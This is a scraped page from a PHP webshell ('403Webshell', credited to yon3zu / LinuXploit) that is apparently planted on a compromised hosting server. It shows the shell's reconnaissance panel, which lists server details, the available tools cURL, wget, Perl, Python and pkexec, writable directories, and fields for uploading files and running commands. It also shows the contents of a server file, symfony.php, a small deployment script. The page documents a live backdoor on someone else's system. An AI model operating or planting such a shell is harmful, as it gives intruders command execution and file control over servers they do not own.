403Webshell
Server IP : 104.21.94.62  /  Your IP : 216.73.216.41
Web Server : Apache
System : Linux semi1.us.cloudlogin.co 5.10.244-xeon-hst #1 SMP Sun Sep 14 17:09:20 UTC 2025 x86_64
User : xessglobal ( 271017)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : ON
Directory :  /proc/self/root/usr/local/ei2/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/local/ei2/symfony.php
#!/usr/local/php7.3/bin/php
<?php
$full_path = $argv[1];
$path = $argv[2];


$cmd = `cp -a /home/www/shared/symfony/$full_path/public/* .`; 

$index = file_get_contents('index.php');
$index = str_replace('__DIR__', "'/home/www/shared/symfony/$full_path/public/'", $index);
$index = str_replace('../', "/", $index);
file_put_contents('index.php', $index);

Youez - 2016 - github.com/yon3zu
LinuXploit